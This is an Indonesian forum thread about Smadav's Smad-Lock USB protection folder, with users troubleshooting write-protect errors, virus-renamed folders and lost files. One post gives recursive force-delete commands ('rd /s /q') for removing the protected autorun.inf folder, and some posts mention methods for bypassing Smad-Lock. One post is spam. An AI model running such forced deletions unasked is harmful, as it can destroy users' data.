[.ShellClassInfo]
CLSID={code windows security}

dan yang membuat dia tidak bisa di buka adalah dia memiliki desktop.ini dan ktika dibuka dia akan mengakses windows security. tapi windows security sendiri tidak bisa berjalan
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: herawan pada Mei 24, 2010, 01:39:56 PM
FLASHDISK SAYA JADI RUSAK SETELAH DIKEBALKAN OLEH SMADAV..ADA YG BISA BANTU SAYA AGAR FLASHDISK SAYA BISA NORMAL KEMBALI??

KALO MASUK FLASHDISK SEKARANG SUKA ADA ALERT BEGINI :

WINDOWS - WRITE PROTECT ERROR

THE DISK CANNOT BE WRITTEN TO BECAUSE IT IS WRITE PROTECTED. PLEASE REMOVE THE WRITE PROTECTION FROM THE VOLUME BHS IN DRIVE \DEVICE\HARDDISK2\DR12


SAYA PERNAH COBA FORMAT GAGAL
SAYA PERNAH FORMAT DI LINUX GAGAL
SAYA PERNAH PAKE HP SYSTEM TOOLS GAGAL.

SAYA MOHON BANTUANNYA.THX
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Rh354 pada Mei 24, 2010, 02:49:23 PM
FLASHDISK SAYA JADI RUSAK SETELAH DIKEBALKAN OLEH SMADAV..ADA YG BISA BANTU SAYA AGAR FLASHDISK SAYA BISA NORMAL KEMBALI??

KALO MASUK FLASHDISK SEKARANG SUKA ADA ALERT BEGINI :

WINDOWS - WRITE PROTECT ERROR

THE DISK CANNOT BE WRITTEN TO BECAUSE IT IS WRITE PROTECTED. PLEASE REMOVE THE WRITE PROTECTION FROM THE VOLUME BHS IN DRIVE \DEVICE\HARDDISK2\DR12


SAYA PERNAH COBA FORMAT GAGAL
SAYA PERNAH FORMAT DI LINUX GAGAL
SAYA PERNAH PAKE HP SYSTEM TOOLS GAGAL.

SAYA MOHON BANTUANNYA.THX

kemungkinan FD nya bermasalah

cos klo dari smadav(gara2 autorun.inf smadlock) pasti di linux masih bs diformat (tested) ga' usah nyampe format deh tp di delete folder ntu aja bs koq klo di linux....cos systemnya beda...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: anehbgt pada Mei 24, 2010, 03:04:18 PM
Gmna klo FD na di unlock dr smadav, tools > smad lock > unlock FD

Btw, laen x kurang gede tuh tulisannya
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 120k125 pada Juni 01, 2010, 02:39:27 PM
Kalo Kejadiannya seperti ini gimana gan..???

(http://i67.servimg.com/u/f67/11/87/01/08/smadav10.jpg)

Soalnya sy gak pernah merasa rename nih folder....
Mohon bantuan gan...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PraskaOkey pada Juni 01, 2010, 02:51:08 PM
Kalo Kejadiannya seperti ini gimana gan..???

(http://i67.servimg.com/u/f67/11/87/01/08/smadav10.jpg)

Soalnya sy gak pernah merasa rename nih folder....
Mohon bantuan gan...

Coba ikutin saran saya  ;) :

1. Klik Kanan pada Folder itu trus klik Properties
2. Klik Customize
3. Klik Change Icon (DiBawah)
4. Pilih yg gambar Folder
5. Klik OK
6. Klik OK lagi...

Sudah bisa blom???  \m/
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: amirdtr pada Juni 01, 2010, 03:02:34 PM
Kalo Kejadiannya seperti ini gimana gan..???

(http://i67.servimg.com/u/f67/11/87/01/08/smadav10.jpg)

Soalnya sy gak pernah merasa rename nih folder....
Mohon bantuan gan...

Coba ikutin saran saya  ;) :

1. Klik Kanan pada Folder itu trus klik Properties
2. Klik Customize
3. Klik Change Icon (DiBawah)
4. Pilih yg gambar Folder
5. Klik OK
6. Klik OK lagi...

Sudah bisa blom???  \m/


Kayaknya bukan icon folder <>Smad-Lock (Brankas Smadav)<> nya yang berubah, tapi sudah diubah oleh virus jadi file :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: anehbgt pada Juni 01, 2010, 03:06:20 PM
betul kata om amir, soalnya folder smad lock klo kaga di aneh"in
tp brubah bgtu positif kena virus tuh..sapa tuh yg tanggung jwb =))

coba di scan dlu gih
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 120k125 pada Juni 01, 2010, 03:20:22 PM
Naah...Malah kayak gini gan....

(http://i67.servimg.com/u/f67/11/87/01/08/sma10.jpg)

...gimana....

@anehbgt : belon discan gan...nanti pulang kerumah deh sy scan...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ran_TH pada Juni 01, 2010, 03:36:38 PM
Ae...
Itu sih bukan folder lagi, tapi file.
Kayaknya ada virus yang mengubah folder kamu jadi file, tapi biasanya folder aslinya disembunyikan.

Coba scan flashdisk kamu pake SmadAV. Setelah di Fix, folder yang tidak terlihat akan terlihat lagi.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 120k125 pada Juni 01, 2010, 03:44:57 PM
Thanks brother semua...sy akan coba nih....
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Juni 02, 2010, 06:16:31 AM
Klo status Smad-Locknya jadi Semi-Locked, kira2 aman g?? Coz klo FD aq dscan pake Morphost Plus, folder autorun.inf jadi keliatan n bisa dibuka2 dalemnya. Gimana kalo folder SmadLocknya diganti
ma folder ―•ı[яαωαяσητεκ]ı•― ??
 :-bd :-bd :-bd :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ryan BeKaBe pada Juni 02, 2010, 09:39:08 AM
Klo status Smad-Locknya jadi Semi-Locked, kira2 aman g?? Coz klo FD aq dscan pake Morphost Plus, folder autorun.inf jadi keliatan n bisa dibuka2 dalemnya. Gimana kalo folder SmadLocknya diganti
ma folder ―•ı[яαωαяσητεκ]ı•― ??
 :-bd :-bd :-bd :-bd

Smad-Lock akan berstatus SEMI-LOCKED jika pada Disk yang di Lock itu:
1. Tidak terdapat folder Δ Smad-Lock (Brankas Smadav) Δ
2. Ada file atau folder yang tidak dihapus SmadAV pada folder "autorun.inf"
3. Sisanya analisa sendiri saja ya..... :)


autorun.inf akan kelihatan isinya jika:
1. File desktop.ini yang ada di dalam folder "autorun.inf" dirubah/dihapus
2. Atribut folder "autorun.inf" menjadi normal
3. Sisanya analisa sendiri saja ya..... :)


Keep in learn guys.... ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Juni 05, 2010, 01:30:01 PM
Kalo folder Smad-Lock diganti dengan folder ney gmn??? Lebih aman lho,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Juni 05, 2010, 01:51:35 PM
Barusan aza mampir ke Morphost Lab, disana nemuin cara bobol folder SmadLock. Benerkan, klo SmadLock jadi ga aman, mending ganti folder yang lebih tahan tembus lagi,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Juni 05, 2010, 04:12:58 PM
@up:itu sudah lama diketahui oleh team..dan smadlock telah diberi ramuan baru agar lebih kebal dari serangan :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Cr4sh pada Juni 07, 2010, 09:49:55 PM
Barusan aza mampir ke Morphost Lab, disana nemuin cara bobol folder SmadLock. Benerkan, klo SmadLock jadi ga aman, mending ganti folder yang lebih tahan tembus lagi,,

kayak pake folder lock gitu ?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PraskaOkey pada Juni 08, 2010, 12:53:11 PM
Bisa nggak yaa... Kalo Folder dikasih Password.. ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Gugel pada Juni 08, 2010, 01:39:21 PM
@up:
afaik, pake tool macem folder guard (http://www.winability.com/) bisa koq...
atau masuk sini :
http://www.klik-kanan.com/tips/tipskiriman.shtml
http://www.password-protect-software.com/password-protect-folders.html
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Juni 09, 2010, 09:00:05 PM
kash saran aj.
kalau takut sma keamanan smadlock utk mencegah file dr infeksi vrs cb aj pki winrar dr winzip
d jmn aman. dh trbukti winzip buatan 2007 tahan sma serangan alman n variant brunya. slain aman bsa d ksh password kq.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PraskaOkey pada Juni 10, 2010, 01:30:51 PM
kash saran aj.
kalau takut sma keamanan smadlock utk mencegah file dr infeksi vrs cb aj pki winrar dr winzip
d jmn aman. dh trbukti winzip buatan 2007 tahan sma serangan alman n variant brunya. slain aman bsa d ksh password kq.
Yups... Betull... Bettuulll... BETULL... :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PA – Ruteng pada Juni 26, 2010, 09:45:57 PM
To Delete Protected Folder "autorun.inf" by SmadAV

Open the "Command Prompt"
Type These Text Below :

rd /s /q G:\autorun.inf\con\aux\
rd /s /q G:\autorun.inf\con\
rd /s /q G:\autorun.inf\

G: => directory


 :-bd  \m/  :-X
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Juni 27, 2010, 07:00:09 AM
kenapa pake hapus folder autorun.inf??? folder itu kan penting buat menghentikan penyebaran virus,,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Cr4sh pada Juni 27, 2010, 07:03:33 AM
kenapa pake hapus folder autorun.inf??? folder itu kan penting buat menghentikan penyebaran virus,,,

baca donk dari awal, ada yan folder brankas smadavnya ke rename, trus gak isa dihapus, ya cara ngapusnya gini, tao pake caranya mas The Gugel disini http://smadaver.com/programming/menghapus-folder-autorun-inf-dengan-vb-6-(source-code)/ , nah kalo dah kehapus, baru deh pasang algi smad locknya  :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: paladin pada Juni 29, 2010, 11:48:48 AM
tapi jujur,virus luar hampir semuanya nggak takut ama smad lock,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: FAKHRICKER pada Juli 28, 2010, 01:24:00 PM
smuanya ngk takut x
he...
XD
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Dimas_97 pada Agustus 02, 2010, 03:52:51 PM
berantas semua virus!!!!!!!!!!!!!!!!!!!!!
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: torubaka pada Agustus 27, 2010, 10:49:47 AM
TOLONGING GUE DONK, DATA - DATA SAYA DI CUT TERUS DI PASTE DI Δ Smad-Lock (Brankas Smadav) Δ, TRUS SETELAH ITU SAYA BUKA FOLDER Δ Smad-Lock (Brankas Smadav) Δ ISINYA EMPTY (FOLDERNYA KOSONG) PADAHAL SETELAH SAYA KLIK KANAN TRUS SAYA CEK PROPERTI FOLDER Δ Smad-Lock (Brankas Smadav) Δ ADA ISINYA... ~x( ~x( :'( :'(
HELP ME PLEASE
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: hatjulhasbi pada Agustus 27, 2010, 10:57:24 AM
Mungkin datanya hIdDen kali
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: torubaka pada Agustus 27, 2010, 11:08:01 AM
udah saya buka di folder option trus dibikin show hidden pokoknya udah semua hiiden di unhide, tapi tetap aja gak timbul filenya,, klo  aku buka (RAR) trus aku buka folder Δ Smad-Lock (Brankas Smadav) Δ kelihatan filenya setelah saya mau extrack langsung operation failed...ada yg tau gak caranya kembaliin file gue, coz berharga banget buat kuliah gue :'( :'(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Gugel pada Agustus 27, 2010, 11:39:07 AM
udah saya buka di folder option trus dibikin show hidden pokoknya udah semua hiiden di unhide, tapi tetap aja gak timbul filenya,, klo  aku buka (RAR) trus aku buka folder Δ Smad-Lock (Brankas Smadav) Δ kelihatan filenya setelah saya mau extrack langsung operation failed...ada yg tau gak caranya kembaliin file gue, coz berharga banget buat kuliah gue :'( :'(
coba di buka ajah pake software free commander... (GRATIS)
download dari sini : http://www.freecommander.com/fc_downl_en.htm

nanti setelah di install, jalankan program nya...
trus, pilih menu Extras--->Setting
akan muncul jendela baru, pilih View
lihat gambar dibawah ini...(pastikan pilihan Show Hidden files dan Show System files tercentang)

(http://i37.tinypic.com/28mi8f9.jpg)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: torubaka pada Agustus 27, 2010, 11:41:37 AM
TOLONGING GUE DONK, DATA - DATA SAYA DI CUT TERUS DI PASTE DI Δ Smad-Lock (Brankas Smadav) Δ, TRUS SETELAH ITU SAYA BUKA FOLDER Δ Smad-Lock (Brankas Smadav) Δ ISINYA EMPTY (FOLDERNYA KOSONG) PADAHAL SETELAH SAYA KLIK KANAN TRUS SAYA CEK PROPERTI FOLDER Δ Smad-Lock (Brankas Smadav) Δ ADA ISINYA... pusing pusing Cry Cry
HELP ME PLEASE
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: The Gugel pada Agustus 27, 2010, 11:46:40 AM
TOLONGING GUE DONK, DATA - DATA SAYA DI CUT TERUS DI PASTE DI Δ Smad-Lock (Brankas Smadav) Δ, TRUS SETELAH ITU SAYA BUKA FOLDER Δ Smad-Lock (Brankas Smadav) Δ ISINYA EMPTY (FOLDERNYA KOSONG) PADAHAL SETELAH SAYA KLIK KANAN TRUS SAYA CEK PROPERTI FOLDER Δ Smad-Lock (Brankas Smadav) Δ ADA ISINYA... pusing pusing Cry Cry
HELP ME PLEASE
coba pake cara yang di sini : http://smadaver.com/bug-kritik-saran/smad-lock/msg118277/#msg118277
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PhaMenThaR pada Agustus 27, 2010, 12:23:21 PM
TOLONGING GUE DONK, DATA - DATA SAYA DI CUT TERUS DI PASTE DI Δ Smad-Lock (Brankas Smadav) Δ, TRUS SETELAH ITU SAYA BUKA FOLDER Δ Smad-Lock (Brankas Smadav) Δ ISINYA EMPTY (FOLDERNYA KOSONG) PADAHAL SETELAH SAYA KLIK KANAN TRUS SAYA CEK PROPERTI FOLDER Δ Smad-Lock (Brankas Smadav) Δ ADA ISINYA... pusing pusing Cry Cry
HELP ME PLEASE
coba pake cara yang di sini : http://smadaver.com/bug-kritik-saran/smad-lock/msg118277/#msg118277
bro koq di FC ade gw ga bisa ke hapus  ya  :-\ :-\
padahal uda pake aplikasi nya bro gugel  :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Misteruddin Digital Media pada Oktober 03, 2010, 05:18:25 PM
 :( :( :( PC ku sering restart..setelahtak kasih Smadav sama avast..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: SeChild pada Oktober 03, 2010, 05:45:05 PM
eh, eh liat deh isi smadlock d FD tmen ku... .
mumpung ada mazzai (mas zai maksudnya) d forum, biar langsung dpt jawaban dari ahlinya :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Uko_Corleone pada Oktober 04, 2010, 01:45:07 PM
eh, eh liat deh isi smadlock d FD tmen ku... .
mumpung ada mazzai (mas zai maksudnya) d forum, biar langsung dpt jawaban dari ahlinya :D
:o :o :o

ha??
ko bisa size-nya sampe 84GB gitu
itu isinya ko junk semua yah ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: SeChild pada Oktober 04, 2010, 06:29:21 PM
lah makanya ane bingung, kan cuma size asli'a cuma 2 gb, smoga mas zai ngeliat post gw, trus d bhaz :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: him2him pada Oktober 10, 2010, 04:40:17 AM
bekup data penting, trus format aja bro....

kan selse masalh...

heheheh...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: narittik pada Oktober 24, 2010, 02:04:21 PM
Maaf kalo repost. Tapi kayaknya ada deh virus yang bisa nembus smad-lock..................
Ini saya dapat dari forum di salah satu AV Lokal juga....
Cekidot......
http://morphians.wordpress.com/2009/12/27/smad-lock-tidak-lagi-aman/
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ĵŏřĩş™ pada Oktober 24, 2010, 02:49:22 PM
Maaf kalo repost. Tapi kayaknya ada deh virus yang bisa nembus smad-lock..................
Ini saya dapat dari forum di salah satu AV Lokal juga....
Cekidot......
http://morphians.wordpress.com/2009/12/27/smad-lock-tidak-lagi-aman/
Udah lama dibahas
Judul: Re:Restore Smadav-Lock)
Ditulis oleh: User saya pada November 05, 2010, 06:53:01 PM
Bagaimana cara membuka smad-lock nya? trims ???
Judul: Re:Restore Smadav-Lock)
Ditulis oleh: hizkia anak Tugib pada November 05, 2010, 08:20:40 PM
Bagaimana cara membuka smad-lock nya? trims ???

Gini caranya
Open smadav=>Tools=>smad-lock
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: krebot pada November 09, 2010, 10:17:06 AM
kaka saya mau bertanya, kenapa ya kok smadavnya secara sepihak selalu membuatkan smad lock di flasdisk saya? apa lagi kalau flasdisknya baru di format, biasanya kan ada konfirmasinya apakah mau ditabalkan atau tidak, versi sekarang kok makin buat rumit aja.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: hizkia anak Tugib pada November 09, 2010, 03:28:25 PM
kaka saya mau bertanya, kenapa ya kok smadavnya secara sepihak selalu membuatkan smad lock di flasdisk saya? apa lagi kalau flasdisknya baru di format, biasanya kan ada konfirmasinya apakah mau ditabalkan atau tidak, versi sekarang kok makin buat rumit aja.

Itu untuk memproteksi Flashdisk kamu supaya kebal dari infeksi virus.klo lbh jls tanya sma masternya langsung OK
 :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: krebot pada November 09, 2010, 03:52:34 PM
kaka saya mau bertanya, kenapa ya kok smadavnya secara sepihak selalu membuatkan smad lock di flasdisk saya? apa lagi kalau flasdisknya baru di format, biasanya kan ada konfirmasinya apakah mau ditabalkan atau tidak, versi sekarang kok makin buat rumit aja.

Itu untuk memproteksi Flashdisk kamu supaya kebal dari infeksi virus.klo lbh jls tanya sma masternya langsung OK
 :-bd

tapi kan kk saya tidak mau ada smad locknya... krn saya bisa jamin 100% klo flash disk saya itu tidak akan bervirus, kalaupun bervirus pasti bisa saya tangani...100% berhasil tuh virus Ko'iD!!!
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: mentalist pada November 09, 2010, 04:23:43 PM
kaka saya mau bertanya, kenapa ya kok smadavnya secara sepihak selalu membuatkan smad lock di flasdisk saya? apa lagi kalau flasdisknya baru di format, biasanya kan ada konfirmasinya apakah mau ditabalkan atau tidak, versi sekarang kok makin buat rumit aja.

Itu untuk memproteksi Flashdisk kamu supaya kebal dari infeksi virus.klo lbh jls tanya sma masternya langsung OK
 :-bd

tapi kan kk saya tidak mau ada smad locknya... krn saya bisa jamin 100% klo flash disk saya itu tidak akan bervirus, kalaupun bervirus pasti bisa saya tangani...100% berhasil tuh virus Ko'iD!!!

ya kalo gitu dinggal di hilangkan aja deh smad-lock nya kalo tdk mau
Cara menghilangkan smad lock :
-masuk smadav
-masuk ke bagian tools
-masuk ke tab smad-lock
-pilih drive
-tinggal unlock deh

beres kan  \m/ \m/ \m/
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada November 10, 2010, 09:21:13 AM
kaka saya mau bertanya, kenapa ya kok smadavnya secara sepihak selalu membuatkan smad lock di flasdisk saya? apa lagi kalau flasdisknya baru di format, biasanya kan ada konfirmasinya apakah mau ditabalkan atau tidak, versi sekarang kok makin buat rumit aja.
ah yang bener?pake smadav rev.berapa?kalo yang baru (8.3) ada notifikasi mau di lock apa enggak UFD nya..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: krebot pada November 10, 2010, 04:51:00 PM
saya memakai SMADAV versi 7.3, krn kinerjanya scannya lbih cpt yg lama krn msh free 100%,

dan menurutku smadav versi lama dgn versi baru cuma beda di pro dan databasenya saja yg berbeda.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: saga_tirta pada November 10, 2010, 05:17:21 PM
saya memakai SMADAV versi 7.3, krn kinerjanya scannya lbih cpt yg lama krn msh free 100%,

dan menurutku smadav versi lama dgn versi baru cuma beda di pro dan databasenya saja yg berbeda.

wokkokowwkow
sorry bro sbuah av kalo databasex update itu lbih aman drpda yg tdk diupdate...
 \m/
hmm kn sma az utk scanningx 10 x lbh cpat g ada bdax/....
 :D
Btw dtmbh av luar g???
 :D :D :D
hmm ykin tuh g ada virus sma skli n ykin tuh bsa nganin sndri klo ada virus.. :D :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: pratama123 pada November 12, 2010, 07:45:19 PM
saya memakai SMADAV versi 7.3, krn kinerjanya scannya lbih cpt yg lama krn msh free 100%,

dan menurutku smadav versi lama dgn versi baru cuma beda di pro dan databasenya saja yg berbeda.
ampun dah bro
w lebih nyaranin pke versi yang baru karena versi lamanya
ga bisa basmi virus yang sekarang
mungkin aja di komputer anda yang sekarang tidak aman dari ancaman virus lokal yang baru
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada November 12, 2010, 10:15:19 PM
kaka saya mau bertanya, kenapa ya kok smadavnya secara sepihak selalu membuatkan smad lock di flasdisk saya? apa lagi kalau flasdisknya baru di format, biasanya kan ada konfirmasinya apakah mau ditabalkan atau tidak, versi sekarang kok makin buat rumit aja.

ehem kk krebot bisa aja ach.....
tapi emg masih yang rev 7 yang agak lumayan dari pada rev lainnya :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: fahi pada November 15, 2010, 10:07:26 PM
Mas mau minta tolong cara hapus file autorun.inf yg dibuat smadav gmn ya?
Masalahnya isi flashdisk sy di hidden virus trus sy mau pakai perintah attrib, tp mentok di file autorun.inf nya(smad lock) yg nga bsa di modif atw delete.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Vj Afive pada November 20, 2010, 08:51:39 AM
Kan Smadav Lock Bisa di remove...

1. Buka Smadav
2. Pilih Tools
3. Smad-Lock
4. Checklist Flasdish/hardish yang akan di Unlock selesai dech


Setahu saya sih begitu dan saya sudah membuktikanya

*Kesalahan Tanggung Jawab User

- Vj Afive -
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: krebot pada November 24, 2010, 04:54:20 PM

wokkokowwkow
sorry bro sbuah av kalo databasex update itu lbih aman drpda yg tdk diupdate...
 \m/
hmm kn sma az utk scanningx 10 x lbh cpat g ada bdax/....
 :D
Btw dtmbh av luar g???
 :D :D :D
hmm ykin tuh g ada virus sma skli n ykin tuh bsa nganin sndri klo ada virus.. :D :D

yakin.

percuma donk ada smadav. 8)  ;D ;D



ampun dah bro
w lebih nyaranin pke versi yang baru karena versi lamanya
ga bisa basmi virus yang sekarang
mungkin aja di komputer anda yang sekarang tidak aman dari ancaman virus lokal yang baru

100% komputer gw ga bakal kena virus jika cuma melalui flasdisk or dvd,

ancaman virus lokal baru = smadav kan ada cek heuristicnya.
dengan gw lock autorun di flasdisk. virus sejago apapun tak akan masuk ke komputer. [gw kan selalu pakai user yg tak bisa instal dan tak bisa utak atik program  ;D ;D ;D jadi ngapain takut sama virus....? :P  :P :-[ ]
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: and1die pada November 29, 2010, 11:10:57 AM
bagaimana cara buka smadav semi lock
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Swordfish pada November 29, 2010, 09:45:53 PM
dari pertama gak pernah make dan menggunakan manfaat smadlock. malah banyak efek negatifnya misalnya kedetect false alarm dari AV import.. yg kedua gak menjamin flashdisk aman dari autorun virus, ada virus yg autorun.inf nya jg bisa write flashdisk, padahal disitu udah ada folder autorun.inf nya smadlock, gak ngefek..
trus sebel tiap colok flashdisk ditanyain apakah anda akan mengaktifkan kekebalan bla bla bla YES/NO ?? untung sekarang udah direvisi hehe  :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: krebot pada Desember 03, 2010, 10:38:49 AM
dari pertama gak pernah make dan menggunakan manfaat smadlock. malah banyak efek negatifnya misalnya kedetect false alarm dari AV import.. yg kedua gak menjamin flashdisk aman dari autorun virus, ada virus yg autorun.inf nya jg bisa write flashdisk, padahal disitu udah ada folder autorun.inf nya smadlock, gak ngefek..
trus sebel tiap colok flashdisk ditanyain apakah anda akan mengaktifkan kekebalan bla bla bla YES/NO ?? untung sekarang udah direvisi hehe  :-bd

nah ini yang saya maksud. flashdisk selalu di tanyai aktifkan kekebalan. pdhal saya tidak mau tapi 5 mnit kemudian tiba2 sudah ada autorun inf nya, gw kan sebel jadinya. krn flasdisk gw kebanyakan buat instal win 7 or win XP via USB memakai hirren' Boot.

kalau ada autorun selalu mengganggu instalasi gw. :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: xpressive pada Desember 30, 2010, 06:21:30 PM
Ko smad-lock nya terdeteksi virus (fake.inf) sama PCTools Spyware doctor with Antivirus
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: agus_suardana pada Desember 30, 2010, 09:42:00 PM
@up
mgkin hanya false alarm bung
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: xpressive pada Desember 31, 2010, 05:12:17 PM
Mungkin false alarm tapi kok bukan sama antivirus ini aja
ke detect sama antivirus di komputer temen
juga

Ingat! Bukan Ngeremehin
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Januari 05, 2011, 12:46:51 PM
Mungkin false alarm tapi kok bukan sama antivirus ini aja
ke detect sama antivirus di komputer temen
juga

Ingat! Bukan Ngeremehin
mank temen nya pake av apa?
kemaren ane juga ngalamin kayak gini..folder smadlock berubah namanya (kayak f7gh,mu9g)..trus typenya berubah jadi file..bukan folder.
Efeknya, tiap kali nyolokin flash..smadav langung keluar pop-up notifikasi untuk pasang smad-lock..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: agus_suardana pada Januari 05, 2011, 02:04:34 PM
wah itu mah udh kna virus sob
cba scan aj
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Vj Afive pada Januari 05, 2011, 02:29:09 PM
Ea gan kuq bisa jadi ganti nama ya


n banyak folder nya

namanya angka ma huruf gitu
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Januari 12, 2011, 12:18:01 PM
Ea gan kuq bisa jadi ganti nama ya


n banyak folder nya

namanya angka ma huruf gitu
tuh artinya komputer anda udah kena virus varian autorn.inf..
pake avg guna pembersihan...:D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: lanuma pada Januari 14, 2011, 05:54:39 PM
Autorun.inf nya smadav secara normal terhidden..

tapi knapa stiap sya masukin di koputer saya autorun.inf nya tidak terhidden??? adahal settingan komputer saya normal...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Januari 26, 2011, 06:14:25 PM
normal gimana?
folder option>hidden system nya kecentang gak?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ifdall pada Januari 28, 2011, 10:55:22 PM
mas smadav v 4 kebaca virus sama kaspersky 2011...updatesmadav.exe
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Januari 29, 2011, 12:35:21 PM
mas smadav v 4 kebaca virus sama kaspersky 2011...updatesmadav.exe
Bukannya masalah ini dah fix ma team kaspie?
Coba lihat post2 sebelumnya...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: makedech pada Januari 31, 2011, 12:34:38 PM
untuk Smad-Lock saya hanya mau beri saran untuk revisi berikutnya, setelah selesai proses instalasi smadav kalau bisa langsung saja smad-lock mengunci semua drive yang ada... sebabnya banyak first user yang belum tahu mengenai hal ini.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: z33s pada Januari 31, 2011, 12:59:55 PM
untuk Smad-Lock saya hanya mau beri saran untuk revisi berikutnya, setelah selesai proses instalasi smadav kalau bisa langsung saja smad-lock mengunci semua drive yang ada... sebabnya banyak first user yang belum tahu mengenai hal ini.

Ane setuju  :-bd :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: pyz pada Mei 11, 2011, 02:47:58 PM
Gimana cara normalin flashdisk write protected karena mengaktifkn perlindungan smadav d flashdisk :'( :'( :'(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kipli pada Mei 15, 2011, 04:05:17 PM
Hallo bro semua mohon bantuannya donk, file2 saya yg saya taro di "smad-lock (Brankas Smadav)" kena virus semua trus berubah ukuran nya jadi total 17 G padahal FD saya cuma 4Giga, trus nama2 file dan folder berubah semua, n file aslinya pada ilang nih screen shoot nya

(http://i53.tinypic.com/29kz8yd.jpg)

Cara balikin file2 saya gimana ya Bro ? saya taruh di folder "smad-lock (Brankas Smadav)" supaya ga kena virus eh malah ini satu2 nya folder yg kena, folder lain nggak
Judul: oOEpPoUYQPlreK
Ditulis oleh: MANGGOLO pada Mei 15, 2011, 04:18:15 PM
WwSagdTMk 661MF6Tmgk (http://videositemapjoy.com/sitemap3802U.xml#tNX0RbkvDlHSf)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kipli pada Mei 15, 2011, 05:08:01 PM
Hallo bro semua mohon bantuannya donk, file2 saya yg saya taro di "smad-lock (Brankas Smadav)" kena virus semua trus berubah ukuran nya jadi total 17 G padahal FD saya cuma 4Giga, trus nama2 file dan folder berubah semua, n file aslinya pada ilang nih screen shoot nya
Cara balikin file2 saya gimana ya Bro ? saya taruh di folder "smad-lock (Brankas Smadav)" supaya ga kena virus eh malah ini satu2 nya folder yg kena, folder lain nggak
Maaf ya gan ,bukannya ane nakut-nakutin.tapi ane ikut bela sungkawa atas kematian flash disk agan.
